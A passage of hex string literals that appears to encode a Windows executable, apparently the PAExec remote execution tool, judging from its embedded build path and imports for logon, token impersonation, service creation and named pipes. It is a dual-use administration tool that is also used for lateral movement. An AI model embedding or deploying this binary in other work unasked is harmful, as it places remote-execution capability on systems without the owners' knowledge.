'0720076006900630065007300410063007400690076006500000000006765' \
'6e6572696300756e6b6e6f776e206572726f72000000696f73747265616d0' \
'0000000696f73747265616d2073747265616d206572726f72000000737973' \
'74656d000053005400520049004e004700200054004f004f0020004c004f0' \
'04e0047003a0020002500730000003c006500720072006f00720020002d00' \
'200073007400720069006e006700200074006f006f0020006c006f006e006' \
'70020002d002d002000000000003e0000003c0073007400720069006e0067' \
'00200066006f0072006d00610074002000650078006300650070007400690' \
'06f006e003a0020005b00000028006e0075006c006c002900000000005d00' \
'3e000000000055006e006b006e006f0077006e0020006500720072006f007' \
'2002000760061006c00750065002e00200000000d0000000a00000020005b' \
'004500720072003d00300078002500300058002c002000250075005d00000' \
'000004600610069006c0065006400200074006f0020006f00700065006e00' \
'2000700072006f006300650073007300200074006f00200065006e0061006' \
'2006c0065002000700072006900760069006c006500670065002000250073' \
'00000043006f0075006c00640020006e006f0074002000660069006e00640' \
'02000700072006900760069006c0065006700650020002500730000000000' \
'00004600610069006c0065006400200074006f002000610064006a0075007' \
'3007400200074006f006b0065006e00200066006f00720020007000720069' \
'00760069006c006500670065002000250073000000576f773634446973616' \
'26c65576f77363446735265646972656374696f6e0000576f773634526576' \
'657274576f77363446735265646972656374696f6e0000004400690073006' \
'10062006c0065006400200057004f005700360034002000660069006c0065' \
'002000730079007300740065006d002000720065006400690072006500630' \
'0740069006f006e00000000004600610069006c0065006400200074006f00' \
'2000640069007300610062006c006500200057004f0057003600340020006' \
'60069006c0065002000730079007300740065006d00200072006500640069' \
'00720065006300740069006f006e0000004600610069006c0065006400200' \
'074006f002000660069006e006400200057006f0077003600340044006900' \
'7300610062006c00650057006f00770036003400460073005200650064006' \
'900720065006300740069006f006e00200041005000490000000000000046' \
'00610069006c0065006400200074006f0020007400720061006e0073006c0' \
'061007400650020005500540046002d0038002000660069006c0065002000' \
'25007300200069006e0074006f00200055006e00690063006f00640065002' \
'e0000004600610069006c0065006400200074006f0020006f00700065006e' \
'00200074006500780074002000660069006c0065002000250073002e00000' \
'0000000000000480000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000060634200202a42003c0000005253445398fceeda9ecc634abe' \
'9a3cedd7daad0d01000000443a5c4465762d4769745c50726f6a5c5041457' \
'865635c52656c656173655c5041457865632e70646200000000000000aa00' \
'0000aa00000000000000386042000000000000000000ffffffff000000004' \
'0000000602642000000000000000000010000007026420044264200000000' \
'000000000000000000000000001c6042008c2642000000000000000000020' \
'000009c264200a826420044264200000000001c6042000100000000000000' \
'ffffffff00000000400000008c26420000000000000000000000000054604' \
'200d8264200000000000000000002000000e8264200f42642004426420000' \
'000000546042000100000000000000ffffffff0000000040000000d826420' \
'0000000000000000000000000746042002427420000000000000000000300' \
'00003427420044274200f4264200442642000000000074604200020000000' \
'0000000ffffffff0000000040000000242742000000000000000000000000' \
'0094604200742742000000000000000000030000008427420094274200f42' \
'642004426420000000000946042000200000000000000ffffffff00000000' \
'4000000074274200000000000000000000000000b4604200c427420000000' \
'0000000000001000000d4274200dc27420000000000b46042000000000000' \
'000000ffffffff0000000040000000c427420000000000000000000000000' \
'03860420060264200000000000000000000000000d06d4200202842000000' \
'00000000000002000000302842003c2842004426420000000000d06d42000' \
'100000000000000ffffffff00000000400000002028420060284200000000' \
'00a46e42000000000000000000ffffffff00000000400000007c284200000' \
'00000000000000100000058284200000000000000000000000000a46e4200' \
'7c284200e46e42000000000000000000ffffffff0000000040000000c4284' \
'200a028420000000000000000000000000001000000bc2842000000000000' \
'00000000000000e46e4200c4284200000000000000000001000000a829420' \
'0607042000000000000000000ffffffff0000000040000000e82842000000' \
'0000000000000300000024294200b029420048294200f8284200000000000' \
'0000000000000000000000084704200fc2942008470420001000000000000' \
'00ffffffff0000000040000000fc294200087042000200000000000000fff' \
'fffff0000000040000000cc29420000000000000000000000000060704200' \
'e828420000000000000000000000000008704200cc294200f828420000000' \
'000347042000200000000000000ffffffff00000000400000001429420000' \
'00000000000000030000000c2a42000000000000000000000000003470420' \
'01429420048294200f828420000000000000000000000000002000000f029' \
'42006429420048294200f82842000000000000000000b5f30000e6f30000c' \
'01c01009069010040860100a68a0100d78a0100f28a0100238b0100ae8b01' \
'00d18b0100048c0100578c01007d8c0100ab8c0100d68c0100f18c01001a8' \
'd0100438d0100718d0100948d0100da8d0100678e01009f8e0100ba8e0100' \
'd58e01000c8f0100958f0100fe8f0100d49001000c910100329101008b910' \
'100ae9101000292010097920100b5920100d0920100f39201002793010063' \
'930100e39301009d940100db94010066950100be950100099601009296010' \
'0ca96010023970100539701008e970100dd970100239801006a980100b398' \
'0100de980100019901002c990100679901000000000000000000000000000' \
'00000000000000016bf400000000000302b4200020000003c2b4200582b42' \
'00000000001c60420000000000ffffffff000000000c000000aabe4000000' \
'000003860420000000000ffffffff000000000c000000abf1400000000000' \
'5460420000000000ffffffff000000000c000000e0be40000000000021bf4' \
'00000000000a02b420003000000b02b4200742b4200582b42000000000074' \
'60420000000000ffffffff000000000c000000c5be40000000000021bf400' \
'000000000dc2b420003000000ec2b4200742b4200582b4200000000009460' \
'420000000000ffffffff000000000c000000fbbe4000feffffff00000000d' \
'4ffffff00000000feffffff000000004ec9400000000000feffffff000000' \
'00d4ffffff00000000feffffff00000000cccb400000000000feffffff000' \
'00000ccffffff00000000feffffff00000000afcc40000000000000000000' \
'79cc4000feffffff00000000d4ffffff00000000feffffff00000000a1cd4' \
'00000000000feffffff00000000d4ffffff00000000feffffffeed5400002' \
'd6400000000000feffffff00000000d4ffffff00000000feffffff0000000' \
'0c7d7400000000000feffffff00000000d4ffffff00000000feffffff0000' \
'00009ad9400000000000feffffff00000000d4ffffff00000000feffffff0' \
'0000000e8e0400000000000feffffff00000000d4ffffff00000000feffff' \
'ff45e4400059e4400000000000feffffff00000000ccffffff00000000fef' \
'fffff58e940006ce9400000000000feffffff00000000d4ffffff00000000' \
'feffffff0000000094f8400000000000feffffff00000000d4ffffff00000' \
'000feffffff0000000092fb400000000000feffffff00000000d4ffffff00' \
'000000feffffff000000003dff400000000000feffffff00000000d0fffff' \
'f00000000feffffff00000000be00410000000000feffffff00000000d8ff' \
'ffff00000000feffffff0000000063044100feffffff000000006f044100f' \
'effffff00000000d8ffffff00000000feffffff00000000d3054100feffff' \
'ff00000000e2054100feffffff00000000d8ffffff00000000feffffff000' \
'00000750b410000000000feffffff000000007cffffff00000000feffffff' \
'00000000fa20410000000000feffffff00000000d0ffffff00000000fefff' \
'fff000000009421410000000000feffffff00000000d8ffffff00000000fe' \
'ffffff00000000c622410000000000feffffff00000000c4ffffff0000000' \
'0feffffff00000000c126410000000000feffffff00000000ccffffff0000' \
'0000feffffff00000000a927410000000000feffffff00000000d0ffffff0' \
'0000000feffffff000000008328410000000000feffffff00000000d8ffff' \
'ff00000000feffffff445b4100485b410000000000feffffff00000000d8f' \
'fffff00000000feffffff105b4100145b410000000000feffffff00000000' \
'd0ffffff00000000feffffff00000000a5674100000000006a67410074674' \
'100feffffff00000000b0ffffff00000000feffffff000000009b5d410000' \
'000000e75c4100f15c4100feffffff00000000d8ffffff00000000fefffff' \
'f096541000d65410000000000feffffff00000000d8ffffff00000000feff' \
'ffffdc5b4100e55b4100400000000000000000000000485e4100ffffffff0' \
'0000000ffffffff0000000000000000000000000100000001000000cc2f42' \
'002205931902000000dc2f420001000000ec2f42000000000000000000000' \
'000000100000000000000feffffff00000000d4ffffff00000000feffffff' \
'876641008b66410000000000225c410000000000543042000200000060304' \
'200582b420000000000d06d420000000000ffffffff000000000c00000007' \
'5c410000000000feffffff00000000d8ffffff00000000feffffff5978410' \
'06c78410000000000feffffff00000000d4ffffff00000000feffffff0000' \
'00009679410000000000feffffff00000000bcffffff00000000feffffff0' \
'0000000b97b410000000000feffffff00000000d8ffffff00000000feffff' \
'ff00000000b87c410000000000feffffff00000000c8ffffff00000000fef' \
'fffff00000000a07e410000000000feffffff00000000d0ffffff00000000' \
'feffffff000000000a88410000000000c46e420000000000ffffffff00000' \
'0000400000000000000010000003c31420000000000000000000000000058' \
'31420022059319040000009431420001000000b4314200000000000000000' \
'00000000001000000ffffffff0000000000000000c18a410001000000cf8a' \
'4100ffffffff0000000000000000020000000300000001000000c83142004' \
'000000000000000000000004f1b40002205931902000000fc314200010000' \
'000c32420000000000000000000000000001000000ffffffff00000000fff' \
'fffff00000000000000000000000001000000010000002032420040000000' \
'00000000000000007e1940002205931901000000543242000000000000000' \
'00000000000000000000000000001000000ffffffffc98b41000000000022' \
'0593190e00000088324200000000000000000000000000000000000000000' \
'00100000000000000ffffffff3e8b410000000000968b4100010000009e8b' \
'410001000000a68b410000000000468b4100040000004e8b4100040000005' \
'68b4100000000005e8b4100070000007e8b410008000000868b4100080000' \
'008e8b410007000000668b41000b0000006e8b41000b000000768b4100220' \
'59319020000001c3342000000000000000000000000000000000000000000' \
'01000000ffffffff0d8b410000000000188b4100220593190400000050334' \
'200020000007033420000000000000000000000000001000000ffffffff00' \
'000000ffffffff00000000010000000000000001000000000000000200000' \
'0020000000300000001000000983342000000000000000000030000000100' \
'0000a83342004000000000000000000000004831400040000000000000000' \
'0000000c93040002205931903000000dc3342000000000000000000000000' \
'00000000000000000001000000ffffffffec8b410000000000f48b4100010' \
'00000fc8b4100220593190100000018344200000000000000000000000000' \
'000000000000000001000000ffffffff728c4100220593190700000044344' \
'200000000000000000000000000000000000000000001000000ffffffff1f' \
'8c410000000000278c4100000000002f8c410000000000378c41000000000' \
'03f8c410000000000478c4100000000004f8c41002205931902000000a034' \
'4200000000000000000000000000000000000000000001000000ffffffffc' \
'68c4100ffffffffce8c41002205931902000000d434420000000000000000' \
'0000000000000000000000000001000000ffffffff8f8e4100ffffffff978' \
'e410022059319020000000835420000000000000000000000000000000000' \
'0000000001000000fffffffff08e4100fffffffffe8e41002205931902000' \
'0003c354200000000000000000000000000000000000000000001000000ff' \
'ffffff5e8d410000000000668d41002205931902000000703542000100000' \
'08035420000000000000000000000000001000000ffffffff00000000ffff' \
'ffff000000000000000000000000010000000100000094354200400000000' \
'000000000000000bb4840002205931903000000c835420001000000e03542' \
'0000000000000000000000000001000000ffffffff00000000000000000c8' \
'd4100ffffffff0000000000000000010000000200000001000000f4354200' \
'400000000000000000000000ea47400022059319020000002836420001000' \
'0003836420000000000000000000000000001000000ffffffff00000000ff' \
'ffffff00000000000000000000000001000000010000004c3642004000000' \
'0000000000000000038464000220593190100000080364200000000000000' \
'000000000000000000000000000001000000ffffffff358d4100220593190' \
'2000000ac36420001000000bc364200000000000000000000000000010000' \
'00ffffffff00000000ffffffff00000000000000000000000001000000010' \
'00000d0364200400000000000000000000000324540002205931905000000' \
'04374200000000000000000000000000000000000000000001000000fffff' \
'fff028e4100000000000d8e410001000000188e4100010000003a8e410001' \
'000000458e410022059319010000005037420000000000000000000000000' \
'0000000000000000001000000ffffffff8c8d410022059319030000007c37' \
'4200000000000000000000000000000000000000000001000000ffffffffb' \
'98d410000000000c48d410000000000cf8d410000000000220593190a0000' \
'00c0374200000000000000000000000000000000000000000001000000000' \
'00000ffffffff278f410000000000328f4100010000003d8f410001000000' \
'488f410001000000538f4100040000005e8f410004000000698f410004000' \
'000748f4100040000007f8f4100010000008a8f4100220593190200000034' \
'384200000000000000000000000000000000000000000001000000fffffff' \
'ffc904100ffffffff0491410000000000220593190b000000703842000000' \
'0000000000000000000000000000000000000100000000000000ffffffffb' \
'68f4100ffffffffbe8f410001000000c68f4100ffffffffc68f4100030000' \
'00ce8f410003000000d68f410005000000de8f4100ffffffffe68f4100070' \
'00000ee8f4100ffffffffee8f410009000000f68f41002205931911000000' \
'f038420000000000000000000000000000000000000000000100000000000' \
'000ffffffff199041000000000024904100010000002f904100010000003a' \
'90410003000000459041000100000050904100050000005b9041000100000' \
'0669041000700000071904100070000007c90410009000000879041000a00' \
'000092904100010000009d9041000c000000a890410001000000b39041000' \
'e000000be90410001000000c990410022059319030000009c394200010000' \
'00b439420000000000000000000000000001000000ffffffff00000000000' \
'0000027914100ffffffff0000000000000000010000000200000001000000' \
'c83942004000000000000000000000006e7640002205931904000000fc394' \
'200000000000000000000000000000000000000000001000000ffffffff5a' \
'9141000000000073914100010000007b91410002000000839141002205931' \
'905000000403a420000000000000000000000000000000000000000000100' \
'0000ffffffffc991410000000000d191410001000000d991410001000000e' \
'191410001000000fa91410022059319010000008c3a420000000000000000' \
'0000000000000000000000000001000000ffffffffa691410000000000220' \
'593190b000000c03a42000000000000000000000000000000000000000000' \
'0100000000000000ffffffff1d9241000000000025924100010000002d924' \
'1000200000035924100020000003d9241000200000045924100020000004d' \
'9241000600000066924100020000007f92410002000000879241000200000' \
'08f92410022059319020000003c3b4200010000004c3b4200000000000000' \
'00000000000001000000ffffffff00000000ffffffff00000000000000000' \
'00000000100000001000000603b4200400000000000000000000000c4a440' \
'002205931902000000943b420001000000a43b42000000000000000000000' \
'0000001000000ffffffff00000000ffffffff000000000000000000000000' \
'0100000001000000b83b420040000000000000000000000092a2400022059' \
'31901000000ec3b4200000000000000000000000000000000000000000001' \
'000000ffffffff0e9341002205931901000000183c4200000000000000000' \
'000000000000000000000000001000000ffffffffeb924100220593190900' \
'0000483c42000000000000000000000000000000000000000000010000000' \
'0000000ffffffff03954100000000000e9541000000000019954100000000' \
'0024954100000000002f954100000000003a954100ffffffff5b954100fff' \
'fffff50954100ffffffff45954100220593190c000000b83c420000000000' \
'000000000000000000000000000000000100000000000000ffffffff24964' \
'100000000002f964100010000003a96410002000000459641000100000045' \
'9641000000000045964100050000007c9641000500000087964100fffffff' \
'f50964100ffffffff5b964100ffffffff66964100ffffffff719641002205' \
'9319020000003c3d420000000000000000000000000000000000000000000' \
'1000000ffffffffc594410000000000d09441002205931903000000703d42' \
'00000000000000000000000000000000000000000001000000ffffffff429' \
'34100000000004d93410001000000589341002205931906000000ac3d4200' \
'000000000000000000000000000000000000000001000000ffffffffb6954' \
'100ffffffff8e9541000100000096954100020000009e95410002000000ae' \
'95410001000000a69541002205931902000000003e4200000000000000000' \
'000000000000000000000000001000000ffffffffba96410000000000c296' \
'41002205931906000000343e4200000000000000000000000000000000000' \
'000000001000000ffffffffd995410000000000e195410001000000e99541' \
'000100000001964100fffffffff195410004000000f995410022059319070' \
'00000883e4200000000000000000000000000000000000000000001000000' \
'ffffffffe596410000000000f096410001000000fb9641000200000003974' \
'100020000000b9741000200000013974100050000001b9741002205931901' \
'000000e43e420000000000000000000000000000000000000000000100000' \
'0ffffffff4b97410000000000220593190b000000183f4200000000000000' \
'00000000000000000000000000000100000000000000ffffffff8b9341000' \
'00000009693410001000000a193410002000000ac93410001000000ac9341' \
'0000000000ac934100ffffffffac93410006000000b793410007000000c29' \
'3410008000000cd93410006000000d89341002205931907000000943f4200' \
'000000000000000000000000000000000000000001000000ffffffff0b944' \
'1000000000016944100000000002194410002000000439441000300000065' \
'944100030000007094410000000000929441002205931903000000f03f420' \
'0000000000000000000000000000000000000000001000000ffffffffbc97' \
'410000000000d297410000000000c797410022059319020000002c4042000' \
'00000000000000000000000000000000000000001000000ffffffff789741' \
'0000000000839741002205931902000000604042000000000000000000000' \
'00000000000000000000001000000ffffffff9298410000000000ab984100' \
'2205931902000000944042000000000000000000000000000000000000000' \
'00001000000ffffffff1c994100ffffffff249941002205931901000000c8' \
'404200000000000000000000000000000000000000000001000000fffffff' \
'f489841002205931903000000f44042000000000000000000000000000000' \
'00000000000001000000ffffffff0b984100ffffffff13984100ffffffff1' \
'b984100220593190600000030414200010000006041420000000000000000' \
'000000000001000000ffffffff479941000000000000000000010000004f9' \
'9410001000000579941000000000000000000040000005f99410001000000' \
'030000000500000001000000744142004000000000000000000000006eb04' \
'0002205931902000000a84142000000000000000000000000000000000000' \
'00000001000000ffffffffce98410000000000d6984100220593190100000' \
'0dc414200000000000000000000000000000000000000000001000000ffff' \
'fffff99841001c45020000000000000000007a45020084a20100f44402000' \
'000000000000000aa4502005ca20100084502000000000000000000144602' \
'0070a201000045020000000000000000003046020068a201002c450200000' \
'00000000000006246020094a20100dc4402000000000000000000d4460200' \
'44a201009842020000000000000000004c49020000a001000c43020000000' \
'00000000000e44e020074a001000000000000000000000000000000000000' \
'000000344902001c49020004490200e6480200c8480200b4480200a448020' \
'0924802007c4802006c480200544802004248020032480200204802000648' \
'0200ec470200d4470200ba470200aa470200984702007a4702006c470200d' \
'c460200fc460200184702002e470200444702005847020000000000105102' \
'001a5102002c510200405102004e5102005c51020072510200825102009c5' \
'10200b6510200d0510200e0510200bc4b02005a4902006c4902007c490200' \
'8c4902009c490200ae490200c2490200d2490200e0490200f4490200044a0' \
'200144a0200204a02003a4a0200584a0200764a0200924a0200aa4a0200c2' \
'4a0200da4a0200ec4a0200fa4a0200104b0200184b0200244b0200384b020' \
'04a4b02005c4b02006a4b0200824b02008e4b0200a04b0200ac4b0200f051' \
'0200ce4b0200e24b0200fa4b02000c4c0200204c0200364c02004c4c02006' \
'a4c0200864c02009e4c0200ac4c0200bc4c0200d04c0200e24c0200f44c02' \
'000e4d0200284d02003c4d02004c4d0200584d0200664d0200724d0200884' \
'd02009e4d0200b84d0200ce4d0200e24d0200fe4d0200164e0200224e0200' \
'384e02004e4e0200764e0200864e02009c4e0200ae4e0200c44e0200d64e0' \
'20002510200f4500200e8500200f24e0200004f02000e4f02001a4f02002c' \
'4f0200404f02005c4f02007c4f0200904f0200a04f0200b04f0200c04f020' \
'0d64f0200e44f0200f64f020010500200285002003e5002004c5002005850' \
'02006a50020074500200805002008c5002009e500200ae500200ca5002000' \
'0000000944602007046020080460200ba460200a446020000000000964502' \
'0086450200000000002046020000000000fa450200e0450200cc450200b84' \
'5020000000000524502003845020068450200000000003a46020052460200' \
'00000000050047657446696c6556657273696f6e496e666f53697a6557000' \
'60047657446696c6556657273696f6e496e666f57000e0056657251756572' \
'7956616c756557000056455253494f4e2e646c6c00da004e6574536572766' \
'572456e756d0065004e65744170694275666665724672656500004e455441' \
'504933322e646c6c00002c00556e6c6f61645573657250726f66696c65002' \
'1004c6f61645573657250726f66696c655700000000437265617465456e76' \
'69726f6e6d656e74426c6f636b0000040044657374726f79456e7669726f6' \
'e6d656e74426c6f636b0055534552454e562e646c6c000600456e756d5072' \
'6f6365737365730050534150492e444c4c001100575453456e756d6572617' \
'46553657373696f6e7357001200575453467265654d656d6f727900575453' \
'41504933322e646c6c00003d00574e65744f70656e456e756d57001c00574' \
'e6574456e756d5265736f7572636557001000574e6574436c6f7365456e75' \
'6d000600574e6574416464436f6e6e656374696f6e3257000c00574e65744' \
'3616e63656c436f6e6e656374696f6e325700004d50522e646c6c00770149' \
'6e697469616c697a65536563757269747944657363726970746f720000b60' \
'2536574536563757269747944657363726970746f724461636c00c2025365' \
'74546f6b656e496e666f726d6174696f6e005a01476574546f6b656e496e6' \
'66f726d6174696f6e00f7014f70656e50726f63657373546f6b656e0000df' \
'004475706c6963617465546f6b656e457800008d014c6f676f6e557365725' \
'700007401496d706572736f6e6174654e616d656450697065436c69656e74' \
'0000fc014f70656e546872656164546f6b656e009002526576657274546f5' \
'3656c6600007301496d706572736f6e6174654c6f676765644f6e55736572' \
'007c0043726561746550726f636573734173557365725700007d004372656' \
'1746550726f63657373576974684c6f676f6e57006c00436f6e7665727453' \
'6964546f537472696e67536964570000f9014f70656e53434d616e6167657' \
'2570000fb014f70656e536572766963655700005c00436f6e74726f6c5365' \
'7276696365000029025175657279536572766963655374617475734578000' \
'0da0044656c65746553657276696365005700436c6f736553657276696365' \
'48616e646c650000810043726561746553657276696365570000c90253746' \
'17274536572766963655700c0025365745365727669636553746174757300' \
'0088025265676973746572536572766963654374726c48616e646c6572570' \
'0c8025374617274536572766963654374726c446973706174636865725700' \
'0101456e756d53657276696365735374617475734578570097014c6f6f6b7' \
'57050726976696c65676556616c756557001f0041646a757374546f6b656e' \
'50726976696c656765730041445641504933322e646c6c0000b10453697a6' \
'<KEY>' \
'4c6f61645265736f7572636500004e0146696e645265736f7572636557004' \
'd0146696e645265736f7572636545785700a0004372656174654e616d6564' \
'5069706557000002024765744c6173744572726f7200005200436c6f73654' \
'8616e646c65006500436f6e6e6563744e616d656450697065000064024765' \
'7453746448616e646c65000085004372656174654576656e74570000c0035' \
'265616446696c650000f70457616974466f724d756c7469706c654f626a65' \
'6374730000b201476574436f6e736f6c6553637265656e427566666572496' \
'<KEY>' \
'657257003104536574436f6e736f6c65437572736f72506f736974696f6e0' \
'000ee00456e746572437269746963616c53656374696f6e000039034c6561' \
'7665437269746963616c53656374696f6e0000eb02496e7465726c6f636b6' \
'56444656372656d656e740000ac01476574436f6e736f6c654d6f64650000' \
'f00147657446696c6553697a6500f90457616974466f7253696e676c654f6' \
'26a65637400b204536c656570002505577269746546696c65005701466c75' \
'736846696c654275666665727300003d04536574436f6e736f6c654d6f646' \
'500000005576169744e616d6564506970655700008f004372656174654669' \
'6c655700ef02496e7465726c6f636b6564496e6372656d656e740000cb024' \
'8656170416c6c6f63004a0247657450726f63657373486561700000cf0248' \
'6561704672656500003f034c6f61644c69627261727957000045024765745' \
'0726f63416464726573730000c00147657443757272656e7450726f636573' \
'73002d04536574436f6e736f6c654374726c48616e646c657200870147657' \
'4436f6d6d616e644c696e655700c0045465726d696e61746550726f636573' \
'730000df0147657445786974436f646550726f63657373000014024765744' \
'd6f64756c6546696c654e616d65570000ec0147657446696c65496e666f72' \
'6d6174696f6e427948616e646c6500001d01457870616e64456e7669726f6' \
'e6d656e74537472696e67735700af0247657457696e646f77734469726563' \
'746f7279570000d60044656c65746546696c655700be0352656164436f6e7' \
'36f6c65570000c40147657443757272656e745468726561640000e8004475' \
'706c696361746548616e646c6500a80043726561746550726f63657373570' \
'000460247657450726f63657373416666696e6974794d61736b00007e0453' \
'657450726f63657373416666696e6974794d61736b00007d0453657450726' \
'96f72697479436c61737300001304526573756d6554687265616400004803' \
'4c6f63616c467265650080034f70656e50726f63657373007500436f70794' \
'6696c6557008e01476574436f6d70757465724e616d654578570000c10147' \
'657443757272656e7450726f636573734964007c045365744e616d6564506' \
'9706548616e646c6553746174650038024765744f7665726c617070656452' \
'6573756c74008f01476574436f6d70757465724e616d65570000e202496e6' \
'97469616c697a65437269746963616c53656374696f6e00d10044656c6574' \
'65437269746963616c53656374696f6e0059045365744576656e740000670' \
'34d756c746942797465546f576964654368617200e100446973636f6e6e65' \
'63744e616d65645069706500e302496e697469616c697a654372697469636' \
'16c53656374696f6e416e645370696e436f756e740024055772697465436f' \
'6e736f6c6557008a034f75747075744465627567537472696e67570000660' \
'453657446696c65506f696e746572000011055769646543686172546f4d75' \
'6c746942797465005e01466f726d61744d6573736167655700001d0453656' \
'17263685061746857004b45524e454c33322e646c6c0000ce024865617044' \
'657374726f7900d202486561705265416c6c6f6300d4024865617053697a6' \
'50000b1035261697365457863657074696f6e000000034973446562756767' \
'657250726573656e74000403497350726f636573736f72466561747572655' \
'0726573656e740035024765744e756d6265724f66436f6e736f6c65496e70' \
'75744576656e7473008b035065656b436f6e736f6c65496e7075744100ea0' \
'0456e636f6465506f696e74657200ca004465636f6465506f696e74657200' \
'b5004372656174655468726561640000c50147657443757272656e7454687' \
'2656164496400001a014578697454687265616400003e034c6f61644c6962' \
'726172794578570000790247657453797374656d54696d65417346696c655' \
'4696d6500e70147657446696c65417474726962757465734578570000ec02' \
'496e7465726c6f636b656445786368616e6765006201467265654c6962726' \
'1727900180452746c556e77696e64000a03497356616c6964436f64655061' \
'6765006801476574414350000037024765744f454d4350000072014765744' \
'350496e666f006902476574537472696e675479706557000073045365744c' \
'6173744572726f720000d304556e68616e646c6564457863657074696f6e4' \
'6696c7465720000a504536574556e68616e646c6564457863657074696f6e' \
'46696c74657200c504546c73416c6c6f630000c704546c7347657456616c7' \
'56500c804546c7353657456616c756500c604546c73467265650063024765' \
'7453746172747570496e666f570018024765744d6f64756c6548616e646c6' \
'5570000f30147657446696c65547970650019014578697450726f63657373' \
'0017024765744d6f64756c6548616e646c6545785700009a01476574436f6' \
'e736f6c6543500000a7035175657279506572666f726d616e6365436f756e' \
'74657200da01476574456e7669726f6e6d656e74537472696e67735700006' \
'10146726565456e7669726f6e6d656e74537472696e677357002d034c434d' \
'6170537472696e67570000870453657453746448616e646c6500006704536' \
'57446696c65506f696e746572457800000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000005ca34100c0704200006042000000000000000000020000000' \
'000000094b14100000000002e3f41566261645f616c6c6f63407374644040' \
'0094b14100000000002e3f4156657863657074696f6e4073746440400094b' \
'14100000000002e3f41566c6f6769635f6572726f72407374644040000000' \
'94b14100000000002e3f41566c656e6774685f6572726f724073746440400' \
'00094b14100000000002e3f41566f75745f6f665f72616e67654073746440' \
'40000094b14100000000002e3f4156747970655f696e666f4040000000000' \
'0808142000000000080814200010100000000000000000000001000000000' \
'0000000000000000000000000000020000000100000000000000000000000' \
'0000000000000000000000000000000020000000200000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'ffffffff0000000000000000000000004ee640bbb119bf440000000000000' \
'0007066420001020408a4030000608279822100000000000000a6df000000' \
'000000a1a5000000000000819fe0fc00000000407e80fc00000000a803000' \
'0c1a3daa320000000000000000000000000000000000000000000000081fe' \
'00000000000040fe000000000000b5030000c1a3daa320000000000000000' \
'000000000000000000000000000000081fe00000000000041fe0000000000' \
'00b6030000cfa2e4a21a00e5a2e8a25b00000000000000000000000000000' \
'0000081fe000000000000407ea1fe000000005105000051da5eda20005fda' \
'6ada32000000000000000000000000000000000081d3d8dee0f90000317e8' \
'1fe0000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000001010101010101010101010101010101010101010' \
'1010101010100000000000002020202020202020202020202020202020202' \
'0202020202020200000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000061' \
'62636465666768696a6b6c6d6e6f707172737475767778797a00000000000' \
'04142434445464748494a4b4c4d4e4f505152535455565758595a00000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000010101010101010101010101010101010101010101010101010' \
'1000000000000020202020202020202020202020202020202020202020202' \
'0202000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'000000000000000000000000000000000006162636465666768696a6b6c6d' \
'6e6f707172737475767778797a0000000000004142434445464748494a4b4' \
'c4d4e4f505152535455565758595a00000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000ffffffff43000000c8b54100ccb54100d0b54100d4b54100d8b54100d' \
'cb54100e0b54100e4b54100ecb54100f4b54100fcb5410008b6410014b641' \
'001cb6410028b641002cb6410030b6410034b6410038b641003cb6410040b' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'00000000000000f4b64100fcb6410004b741000cb7410014b741001cb7410' \
'024b741002cb741003cb741004cb741005cb7410070b7410084b7410094b7' \
'4100a8b74100b0b74100b8b74100c0b74100c8b74100d0b74100d8b74100e' \
'0b74100e8b74100f0b74100f8b7410000b8410008b8410018b841002cb841' \
'0038b84100c8b7410044b8410050b841005cb841006cb8410080b8410090b' \
'84100a4b84100b8b84100c0b84100c8b84100dcb8410004b9410018b94100' \
'006a420001000000000000000000000000000000000000000000000000000' \
'0000000000000000000946842000000000000000000000000009468420000' \
